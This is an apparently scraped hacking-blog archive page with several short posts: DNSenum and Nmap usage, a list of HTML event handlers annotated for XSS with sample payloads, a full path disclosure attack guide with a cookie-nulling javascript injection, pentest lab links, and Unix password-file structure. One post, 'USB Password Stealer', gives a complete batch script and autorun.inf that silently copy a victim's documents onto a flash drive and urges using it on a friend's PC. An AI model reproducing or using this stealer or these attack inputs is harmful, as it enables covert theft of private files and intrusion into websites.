Dnsenum using information gathering tutorial

Hello Guys 

 Today I will show you DNSENUM information gathering tool.

 DNSenum is a pentesting tool created to enumerate DNS info about domains.

The purpose of Dnsenum is to gather as much information as possible about a domain

DNSenum is a very important tool to perform a quick enumeration step on penetration testing.
    Host address
    Name server
    MX record
    Sub domains
    Whois performance
    Reverse lookup for netblocks
    Use google to do the job done

use:
------------------------------------------------------------------
1)Simple scan
     dnsenum google.com

2)Powerful scan use
     dnsenum --enum google.com

3)More power scan with sub domains
     dnsenum --enum -f -r google.com

Note:
if you get error like this

Warning: can't load Net::Whois::IP module, whois queries disabled.

--> apt-get install cparminus
--> cpanm -n Net::Whois::IP



Thank you (zer0w0rm)
Posted by Zer0w0rm at 10:20 AM 2 comments

 

HTML event handlers

Hello Today I will share with you some HTML event handlers which is use in xss and any web event handler .

1.    FSCommand() (attacker can use this when executed from within an embedded Flash object)
2.    onAbort() (when user aborts the loading of an image)
3.    onActivate() (when object is set as the active element)
4.    onAfterPrint() (activates after user prints or previews print job)
5.    onAfterUpdate() (activates on data object after updating data in the source object)
6.    onBeforeActivate() (fires before the object is set as the active element)
7.    onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
8.    onBeforeCut() (attacker executes the attack string right before a selection is cut)
9.    onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
10.    onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
11.    onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
12.    onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
13.    onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
14.    onBegin() (the onbegin event fires immediately when the element's timeline begins)
15.    onBlur() (in the case where another popup is loaded and window looses focus)
16.    onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
17.    onCellChange() (fires when data changes in the data provider)
18.    onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
19.    onClick() (someone clicks on a form)
20.    onContextMenu() (user would need to right click on attack area)
21.    onControlSelect() (fires when the user is about to make a control selection of the object)
22.    onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
23.    onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
24.    onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
25.    onDataSetChanged() (fires when the data set exposed by a data source object changes)
26.    onDataSetComplete() (fires to indicate that all data is available from the data source object)
27.    onDblClick() (user double-clicks a form element or a link)
28.    onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
29.    onDrag() (requires that the user drags an object)
30.    onDragEnd() (requires that the user drags an object)
31.    onDragLeave() (requires that the user drags an object off a valid location)
32.    onDragEnter() (requires that the user drags an object into a valid location)
33.    onDragOver() (requires that the user drags an object into a valid location)
34.    onDragDrop() (user drops an object (e.g. file) onto the browser window)
35.    onDrop() (user drops an object (e.g. file) onto the browser window)
36.    onEnd() (the onEnd event fires when the timeline ends.  This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
37.    onError() (loading of a document or image causes an error)
38.    onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
39.    onFilterChange() (fires when a visual filter completes state change)
40.    onFinish() (attacker can create the exploit when marquee is finished looping)
41.    onFocus() (attacker executes the attack string when the window gets focus)
42.    onFocusIn() (attacker executes the attack string when window gets focus)
43.    onFocusOut() (attacker executes the attack string when window looses focus)
44.    onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
45.    onKeyDown() (user depresses a key)
46.    onKeyPress() (user presses or holds down a key)
47.    onKeyUp() (user releases a key)
48.    onLayoutComplete() (user would have to print or print preview)
49.    onLoad() (attacker executes the attack string after the window loads)
50.    onLoseCapture() (can be exploited by the releaseCapture() method)
51.    onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
52.    onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
53.    onMouseDown() (the attacker would need to get the user to click on an image)
54.    onMouseEnter() (cursor moves over an object or area)
55.    onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
56.    onMouseMove() (the attacker would need to get the user to mouse over an image or table)
57.    onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
58.    onMouseOver() (cursor moves over an object or area)
59.    onMouseUp() (the attacker would need to get the user to click on an image)
60.    onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
61.    onMove() (user or attacker would move the page)
62.    onMoveEnd() (user or attacker would move the page)
63.    onMoveStart() (user or attacker would move the page)
64.    onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
65.    onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
66.    onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
67.    onProgress() (attacker would use this as a flash movie was loading)
68.    onPropertyChange() (user or attacker would need to change an element property)
69.    onReadyStateChange() (user or attacker would need to change an element property)
70.    onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
71.    onReset() (user or attacker resets a form)
72.    onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
73.    onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
74.    onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
75.    onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
76.    onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
77.    onRowsEnter() (user or attacker would need to change a row in a data source)
78.    onRowExit() (user or attacker would need to change a row in a data source)
79.    onRowDelete() (user or attacker would need to delete a row in a data source)
80.    onRowInserted() (user or attacker would need to insert a row in a data source)
81.    onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
82.    onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
83.    onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
84.    onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
85.    onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
86.    onStart() (fires at the beginning of each marquee loop)
87.    onStop() (user would need to press the stop button or leave the webpage)
88.    onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
89.    onSubmit() (requires attacker or user submits a form)
90.    onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
91.    onTrackChange() (user or attacker changes track in a playList)
92.    onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
93.    onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
94.    seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)
Thank you (zer0w0rm)
Posted by Zer0w0rm at 10:32 PM 1 comments

 

How to Change Windows 7 Logon Screen ?

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.


1. The image you need to set as the background should be a .jpg file and it's size should not exceed 245KB.
 
2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your
image. Once you're done, save this image as background.jpg.
 
3. You will need to copy this image to
C://Windows/system32/oobe/backgrounds
You will need to create that path if it does not already exist on your computer.
 
4. Now open the Registry Editor (Start -> Run -> Type regedit) and
navigate to the following key
HKLM>Software>Microsoft>Windows>CurrentVersion>Authentication>LogonUI>Background
If Background does not existrightclickLogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and
select New and then DWORD and name it OEMBackground.
 
5. Double-click on OEMBackground and set the Value Data to 1.
 
6. Now log-off to see the new logon screen background

Thank you (zer0w0rm)
Posted by Zer0w0rm at 8:53 PM 0 comments

 

USB Password Stealer

In today's article I am going to teach you something illegal but only for educational propose. This only demonstrates how you can copy files from your friend's PC as soon as you plug in your flash drive or any removable storage media.

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we'll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit


:ERROR
exit

What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’'t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user's documents are usually stored in %systemroot%\Documents and Settings folder.

Now I've defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes 0.

Case ERROR will execute when the Documents and Settings doesn't exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let's create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier

The above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.



Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).



Another thing is that it determines the windows by searching the file users and Documents and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.

Thank you(zer0w0rm)
Posted by Zer0w0rm at 8:38 PM 1 comments

 

Full Path Disclosure Attack

Hello Today I will discuss on FPD web application attack.

------------------------------------------------------------------------------
What is Full Path Disclosure?
------------------------------------------------------------------------------

To put it simply, Full Path Disclosure (FPD) is the revelation of the full path of a given file. FPD is performed by causing an error within a targeted website, which in turn, spits out an error message for an attacker to see. FPD vulnerabilities are generally looked upon as low risk and are too often overlooked by web-masters as nothing to worry about, I will take care of it later. This can sometimes be a fatal mistake. 

------------------------------------------------------------------------------
When and why are path disclosure vulnerabilities useful?
------------------------------------------------------------------------------

While FPD vulnerabilities are low risk, they can be used in conjunction with other exploiting techniques and can often be the key to a successful hack. 

One example of such a relationship would be the use of an LFI (Local File Include) vulnerability partnered with FPD. With LFI, the attacker may not be able to find the containing folder for a certain file they wish to view (for example: config.php) or maybe the standard includes folder has been renamed. If an attacker can cause an error that will spit out the location of the folder, it would make the hack much faster, smoother and easier then trying to guess the path. The attacker might even get lucky and find that the web-master uses txt files to store database information rather then SQL (do not laugh, it happens).

------------------------------------------------------------------------------
How do I find a path disclosure vulnerability?
------------------------------------------------------------------------------

There are a number of ways to test for FPD vulnerabilities, each take little time to achieve. 

The first method is to find a page that calls from an array, for example: index.php?page=home. To check this for a vulnerability, one would add an inoperable value to the URL. There are a number of ways to do this. The most effective of which would be to add open and closed square brackets [] to the end of the page value, this makes the call for the page defunct. The URL for this example would be index.php?page[]=home. This method would call such errors as:

Warning: opendir(Array): failed to open dir: No such file or directory in /home/www/example/kei/photo/index.php on line 297

Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/home/example/html/pie/index.php on line 131

Another method that can cause an FPD is to add an inoperable value to a cookie. The easiest and most common of which is to null the session cookie. In order to do this, one must use Javascript injection to inject the invalid value. To do this, add the following line into the URL bar in a web browser: javascript:void(document.cookie='PHPSESSID='); (If you do not know how or why this works, refer to the Javascript injection article). This can cause the following error:

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
 
Array[] Parameter Injection is made possible when a script is devising a call via the $_GET parameter. If the $_GET parameter is wrapped in a function that expects a string—for instance, htmlentities() or opendir()—but receives an array, it will result in an error message. The output of the error message will look similar to the following:

Warning: htmlentities() expects parameter 1 to be string, array given in /var/www/foobar.php on line 16
As the function is expecting that parameter to be a string, the result of the given array will render the parameter call defunct, outputting only the error from the function. 


------------------------------------------------------------------------------
How do I prevent such vulnerabilities?
------------------------------------------------------------------------------

The simplest way to prevent these vulnerabilities is to simply turn off error reporting within your server. This will immediately turn off any errors that may be caused. The problem with this method however is that if you do have a problem with one of your scripts, it can be hard to determine where and what the problem is without the aid of the error message. 


Regular expressions are also useful in disabling the errors, especially in the case of the cookie injection. With the array vulnerabilities, the is_array() function can be used to patch the vulnerability. The good thing about these last two methods is that you can also use them to echo fake errors to confuse your attacker. 

------------------------------------------------------------------------------
Conclusion
------------------------------------------------------------------------------

In conclusion, I would like to once again stress that these vulnerabilities are useful only in certain circumstances and wont allow you to penetrate a server/site with this technique alone. You will have to rely on other techniques in conjunction with this vulnerability or other insecure practices (bad file extensions etc). 

I hope you enjoyed the article and learned something from it. 

 Thank you (zer0w0rm)
Posted by Zer0w0rm at 1:52 AM 0 comments

 

Pen-testing List of Labs

Vulnerable Web Applications
OWASP BWA http://code.google.com/p/owaspbwa/
OWASP Hackademic http://hackademic1.teilar.gr/
OWASP SiteGenerator https://www.owasp.org/index.php/Owasp_SiteGenerator
OWASP Bricks http://sourceforge.net/projects/owaspbricks/
OWASP Security Shepherd https://www.owasp.org/index.php/OWASP_Security_Shepherd
Damn Vulnerable Web App (DVWA) http://www.dvwa.co.uk/
Damn Vulnerable Web Services (DVWS) http://dvws.professionallyevil.com/
WebGoat.NET https://github.com/jerryhoff/WebGoat.NET/
PentesterLab https://pentesterlab.com/
Butterfly Security Project http://thebutterflytmp.sourceforge.net/
Foundstone Hackme Bank http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Foundstone Hackme Books http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Foundstone Hackme Casino http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Foundstone Hackme Shipping http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Foundstone Hackme Travel http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
LAMPSecurity http://sourceforge.net/projects/lampsecurity/
Moth http://www.bonsai-sec.com/en/research/moth.php
WackoPicko https://github.com/adamdoupe/WackoPicko
BadStore http://www.badstore.net/
WebSecurity Dojo http://www.mavensecurity.com/web_security_dojo/
BodgeIt Store http://code.google.com/p/bodgeit/
hackxor http://hackxor.sourceforge.net/cgi-bin/index.pl
SecuriBench http://suif.stanford.edu/~livshits/securibench/
SQLol https://github.com/SpiderLabs/SQLol
CryptOMG https://github.com/SpiderLabs/CryptOMG
XMLmao  https://github.com/SpiderLabs/XMLmao
Exploit KB Vulnerable Web App http://exploit.co.il/projects/vuln-web-app/
PHDays iBank CTF http://blog.phdays.com/2012/05/once-again-about-remote-banking.html
GameOver http://sourceforge.net/projects/null-gameover/
Zap WAVE http://code.google.com/p/zaproxy/downloads/detail?name=zap-wave-0.1.zip
PuzzleMall http://code.google.com/p/puzzlemall/
VulnApp http://www.nth-dimension.org.uk/blog.php?id=88
sqli-labs https://github.com/Audi-1/sqli-labs
Drunk Admin Web Hacking Challenge https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/
bWAPP http://www.mmeit.be/bwapp/
http://sourceforge.net/projects/bwapp/files/bee-box/
NOWASP / Mutillidae 2  http://sourceforge.net/projects/mutillidae/
SocketToMe http://digi.ninja/projects/sockettome.php
Vulnerable Operating System Installations
Damn Vulnerable Linux http://sourceforge.net/projects/virtualhacking/files/os/dvl/
Metasploitable http://sourceforge.net/projects/virtualhacking/files/os/metasploitable/
LAMPSecurity http://sourceforge.net/projects/lampsecurity/
UltimateLAMP http://www.amanhardikar.com/mindmaps/practice-links.html
heorot: DE-ICE, hackerdemia http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso
http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso
http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso
http://hackingdojo.com/downloads/iso/De-ICE_S2.100.iso
hackerdemia – http://hackingdojo.com/downloads/iso/De-ICE_S1.123.iso
pWnOS http://www.pwnos.com/
Holynix http://sourceforge.net/projects/holynix/files/
Kioptrix http://www.kioptrix.com/blog/
exploit-exercises – nebula, protostar, fusion http://exploit-exercises.com/download
PenTest Laboratory  http://pentestlab.org/lab-in-a-box/
RebootUser Vulnix http://www.rebootuser.com/?page_id=1041
neutronstar http://neutronstar.org/goatselinux.html
scriptjunkie.us  http://www.scriptjunkie.us/2012/04/the-hacker-games/
21LTR http://21ltr.com/scenes/
SecGame # 1: Sauron http://sg6-labs.blogspot.co.uk/2007/12/secgame-1-sauron.html
Pentester Lab https://www.pentesterlab.com/exercises
Vulnserver http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
TurnKey Linux http://www.turnkeylinux.org/
Bitnami https://bitnami.com/stacks
Elastic Server http://elasticserver.com
CentOS http://www.centos.org/
Sites for Downloading Older Versions of Various Software
Exploit-DB http://www.exploit-db.com/
Old Version http://www.oldversion.com/
Old Apps  http://www.oldapps.com/
VirtualHacking Repo sourceforge.net/projects/virtualhacking/files/apps%40realworld/
Sites by Vendors of Security Testing Software
Acunetix acuforum http://testasp.vulnweb.com/
Acunetix acublog http://testaspnet.vulnweb.com/
Acunetix acuart http://testphp.vulnweb.com/
Cenzic crackmebank http://crackme.cenzic.com
HP freebank http://zero.webappsecurity.com
IBM altoromutual http://demo.testfire.net/
Mavituna testsparker http://aspnet.testsparker.com
Mavituna testsparker http://php.testsparker.com
NTOSpider Test Site http://www.webscantest.com/
Sites for Improving Your Hacking Skills
EnigmaGroup http://www.enigmagroup.org/
Exploit Exercises http://exploit-exercises.com/
Google Gruyere http://google-gruyere.appspot.com/
Gh0st Lab http://www.gh0st.net/
Hack A Server  https://hackaserver.com/
Hack This Site  http://www.hackthissite.org/
HackThis  http://www.hackthis.co.uk/
HackQuest http://www.hackquest.com/
Hack.me https://hack.me
Hacking-Lab https://www.hacking-lab.com
Hacker Challenge http://www.dareyourmind.net/
Hacker Test http://www.hackertest.net/
hACME Game http://www.hacmegame.org/
Hax.Tor http://hax.tor.hu/
OverTheWire http://www.overthewire.org/wargames/
PentestIT  http://www.pentestit.ru/en/
p0wnlabs  http://p0wnlabs.com/
pwn0 https://pwn0.com/home.php
RootContest http://rootcontest.com/
Root Me http://www.root-me.org/?lang=en
Security Treasure Hunt http://www.securitytreasurehunt.com/
Smash The Stack http://www.smashthestack.org/
TheBlackSheep and Erik  http://www.bright-shadows.net/
ThisIsLegal http://thisislegal.com/
Try2Hack http://www.try2hack.nl/
WabLab http://www.wablab.com/hackme
XSS: Can You XSS This? http://canyouxssthis.com/HTMLSanitizer/
XSS: ProgPHP http://xss.progphp.com/
CTF Sites / Archives
CTFtime (Details of CTF Challenges) http://ctftime.org/ctfs/
shell-storm Repo http://shell-storm.org/repo/CTF/
CAPTF Repo http://captf.com/
VulnHub https://www.vulnhub.com
CTF365 http://ctf365.com/
Hacker Cons http://hackercons.org/
Hat Force https://www.hatforce.com/
Intense School http://www.intenseschool.com/resources/
SECore https://secore.info/
Mobile Apps
ExploitMe Mobile Android Labs http://securitycompass.github.io/AndroidLabs/
ExploitMe Mobile iPhone Labs http://securitycompass.github.io/iPhoneLabs/
OWASP iGoat  http://code.google.com/p/owasp-igoat/
OWASP Goatdroid https://github.com/jackMannino/OWASP-GoatDroid-Project
Damn Vulnerable iOS App (DVIA) http://damnvulnerableiosapp.com/
Damn Vulnerable Android App (DVAA) https://code.google.com/p/dvaa/
Damn Vulnerable FirefoxOS Application (DVFA) https://github.com/pwnetrationguru/dvfa/
NcN Wargame http://noconname.org/evento/wargame/
Hacme Bank Android http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx
InsecureBank http://www.paladion.net/downloadapp.html
Miscellaneous
VulnVPN http://www.rebootuser.com/?page_id=1041
VulnVoIP http://www.rebootuser.com/?page_id=1041
NETinVM http://informatica.uv.es/~carlos/docencia/netinvm/
GNS3 http://sourceforge.net/projects/gns-3/
XAMPP https://www.apachefriends.org/index.html

 Thank you (zer0w0rm)
Posted by Zer0w0rm at 9:30 AM 5 comments

 

Search Engine Assessment Tool

Introduction

 SEAT (Search Engine Assessment Tool) is the next generation information digging application geared toward the needs of security professionals. SEAT uses information stored in search engine databases, cache repositories, and other public resources to scan web sites for potential vulnerabilities. It’s multi- threaded, multi-database, and multi-search-engine capabilities permit easy navigation through vast amounts of information with a goal of system security assessment. Furthermore, SEAT’s ability to easily process additional search engine signatures as well as custom made vulnerability databases allows security professionals to adapt SEAT to their specific needs.


Features

 The most important strength of SEAT is it's ability to simulate what attackers or malware would do when they anonymously collect potentially harmful public information available on your site. Using SEAT you can perform similar assessments faster with the ability to dig through large sets of information to pinpoint potential vulnerabilities.

 Search Engine Abstraction

 SEAT utilizes search engine abstraction to automatically adapt queries to multiple search engines. This means that a single signature that could normally be applied to only a single search engine, will be abstracted and adapted to all search engines supported by SEAT. This will increase your chances of finding a vulnerability that would otherwise be missed by a single search engine approach.

 Performance

 From high performance database which allows you to quickly store and retrieve thousands of mined results and domains to flexible multi-threaded query engine, all parts of SEAT are optimized for quick and reliable performance.

 Note: SEAT does not use APIs provided by some search engines, thus avoiding unnecessary limitations in the number of requests made in a given period of time.

 Usability

 A great deal of time went in to design of a user-friendly and efficient GUI to allow you to get the most from time spent working with the tool. Almost every part of SEAT can be adjusted to fit your individual needs while providing default settings for the beginning users.

 Anonymity

 SEAT offers a degree of anonymity due to its reliance on publicly available information to assess a target. At no point during its execution SEAT is communicating directly with the target site. This however does not mean you are 100% anonymous, because you are still communicating with various databases which if necessary can and will reveal logs of your activity. You have been warned.
Installation

 You will need Perl versions 5.8.0-RC3 and later. Additionally SEAT requires several Perl modules:
  • Gtk2
  • threads
  • threads::shared
  • XML::Smart

Ubuntu

 Default Ubuntu installation comes with both Gtk2 and threads Perl modules. Normally, your installation steps will be limited to the following:

                                  sudo apt-get install libxml-smart-perl

 Running SEAT

 To run SEAT, change your directory to seat/ and execute SEAT with:

                                 ./seat

 Note: There is no need for root privileges

 References ----->

 Google Hacking Database - The original source of inspiration for the project.
ExploitDB GHDB - Updated Google Dorks database hosted by ExploitDB
Google Hacking Diggity - Google and Bing dorks tool that relies on official search APIs.
Thank you (zer0w0rm)
Posted by Zer0w0rm at 8:22 AM 3 comments

 

Linux & Unix Password File Structure

Hello Today I will teach you about Linux & Unix Password file structure. In that file user login id and password will be stored and about that structure.

Traditional Unix systems keep user account information, including one-way encrypted passwords, in a text file called ``/etc/passwd''. As this file is used by many tools (such as ``ls'') to display file ownerships, etc. by matching user id #'s with the user's names, the file needs to be world-readable. Consequentally, this can be somewhat of a security risk.

Another method of storing account information, one that I always use, is with the shadow password format. As with the traditional method, this method stores account information in the /etc/passwd file in a compatible format. However, the password is stored as a single "x" character (ie. not actually stored in this file). A second file, called ``/etc/shadow'', contains encrypted password as well as other information such as account or password expiration values, etc. The /etc/shadow file is readable only by the root account and is therefore less of a security risk.

While some other Linux distributions forces you to install the Shadow Password Suite in order to use the shadow format, Red Hat makes it simple. To switch between the two formats, type (as root):

/usr/sbin/pwconv    To convert to the shadow format
/usr/sbin/pwunconv    To convert back to the traditional format


With shadow passwords, the ``/etc/passwd'' file contains account information, and looks like this:




Each field in a passwd entry is separated with ":" colon characters, and are as follows:

1. USERNAME:

Username, up to 8 characters. Case-sensitive, usually all lowercase

2. The encrypted password:

An "x" in the password field. Passwords are stored in the ``/etc/shadow'' file. (Else, a user’s password is encoded using a modified version of DES and a two-character Salt value, ranging values from 0-4096. The modified version of DES (used in the crypt function), was a one-way hashing algorithm.)

3. User ID:

Numeric user id. This is assigned by the ``adduser'' script. Unix uses this field, plus the following group field, to identify which files belong to the user. ( Value 0 is reserved for root, values 1-99 are for predefined accounts. 100-999 are also reserved for system administrator and system users/groups.)

4. Group ID:

Numeric group id. Red Hat uses group id's in a fairly unique manner for enhanced file security. Usually the group id will match the user id.

 5. GECOS/User Info:

Full name of user. I'm not sure what the maximum length for this field is, but try to keep it reasonable (under 30 characters).


  • User’s full name
  • Building and room number or contact person
  • Office telephone number
  • Any other information (page number, fax, etc.)

6. Home Directory:

User's home directory. Usually /home/username (eg. /home/zer0w0rm). All user's personal files, web pages, mail forwarding, etc. will be stored here.

 
7. Command/shell:

User's "shell account". Often set to ``/bin/bash'' to provide access to the bash shell (my personal favourite shell).

The ``/etc/shadow'' file contains password and account expiration information for users, and looks like this:


As with the passwd file, each field in the shadow file is also separated with ":" colon characters, and are as follows:


1. Username, up to 8 characters. Case-sensitive, usually all lowercase. A direct match to the username in the /etc/passwd file.


2. Password, 13 character encrypted. A blank entry (eg. ::) indicates a password is not required to log in (usually a bad idea), and a ``*'' entry (eg. :*:) indicates the account has been disabled.


  • The $1$ denotes that the MD5 algorithm was used. $2a$ for blowfish, $5$ for SHA-256 and $6$ for SHA-512. NB: rounds can be varied for Blowfish and SHA-256/512 by using $6$rounds=n%.

  • The first string between the subsequent $’s represents the salt

  • The subsequent string (without a trailing $, instead with a tailing :) is the encrypted password

3. The number of days (since January 1, 1970) since the password was last changed.


4. The number of days before password may be changed (0 indicates it may be changed at any time)


5. The number of days after which password must be changed (99999 indicates user can keep his or her password unchanged for many, many years)


6. The number of days to warn user of an expiring password (7 for a full week)


7. The number of days after password expires that account is disabled


8. The number of days since January 1, 1970 that an account has been disabled


9. A reserved field for possible future use


Thank you (zer0w0rm)
Posted by Zer0w0rm at 8:46 AM 0 comments

 

How to add full Repository in Kali Linux

In this post I will show you how to add full repository in kali linux.

 Step 1:-->

           open the terminal and type vi /etc/apt/sources.list 

 Step 2:-->

            Press insert or I or copy this repository link in that file.
deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

         and press esc & type :wq & press enter to save change made that file.

 Step 3:-->

          After that run that command to update and upgrade

         sudo apt-get update && upgrade

         that's it.
Thank you (zer0w0rm)
Posted by Zer0w0rm at 12:55 AM 0 comments

 

Nmap Cheat Sheet

Nmap Cheat Sheet


Basic Scanning Techniques
Scan a single target —> nmap [target]
Scan multiple targets —> nmap [target1,target2,etc]
Scan a list of targets —-> nmap -iL [list.txt]
Scan a range of hosts —-> nmap [range of IP addresses]
Scan an entire subnet —-> nmap [IP address/cdir]
Scan random hosts —-> nmap -iR [number]
Excluding targets from a scan —> nmap [targets] –exclude [targets]
Excluding targets using a list —> nmap [targets] –excludefile [list.txt]
Perform an aggressive scan —> nmap -A [target]
Scan an IPv6 target —> nmap -6 [target]

Discovery Options
Perform a ping scan only —> nmap -sP [target]
Don’t ping —> nmap -PN [target]
TCP SYN Ping —> nmap -PS [target]
TCP ACK ping —-> nmap -PA [target]
UDP ping —-> nmap -PU [target]
SCTP Init Ping —> nmap -PY [target]
ICMP echo ping —-> nmap -PE [target]
ICMP Timestamp ping —> nmap -PP [target]
ICMP address mask ping —> nmap -PM [target]
IP protocol ping —-> nmap -PO [target]
ARP ping —> nmap -PR [target]
Traceroute —> nmap –traceroute [target]
Force reverse DNS resolution —> nmap -R [target]
Disable reverse DNS resolution —> nmap -n [target]
Alternative DNS lookup —> nmap –system-dns [target]
Manually specify DNS servers —> nmap –dns-servers [servers] [target]
Create a host list —-> nmap -sL [targets]

Advanced Scanning Options
TCP SYN Scan —> nmap -sS [target]
TCP connect scan —-> nmap -sT [target]
UDP scan —-> nmap -sU [target]
TCP Null scan —-> nmap -sN [target]
TCP Fin scan —> nmap -sF [target]
Xmas scan —-> nmap -sX [target]
TCP ACK scan —> nmap -sA [target]
Custom TCP scan —-> nmap –scanflags [flags] [target]
IP protocol scan —-> nmap -sO [target]
Send Raw Ethernet packets —-> nmap –send-eth [target]
Send IP packets —-> nmap –send-ip [target]

Port Scanning Options
Perform a fast scan —> nmap -F [target]
Scan specific ports —-> nmap -p [ports] [target]
Scan ports by name —-> nmap -p [port name] [target]
Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]
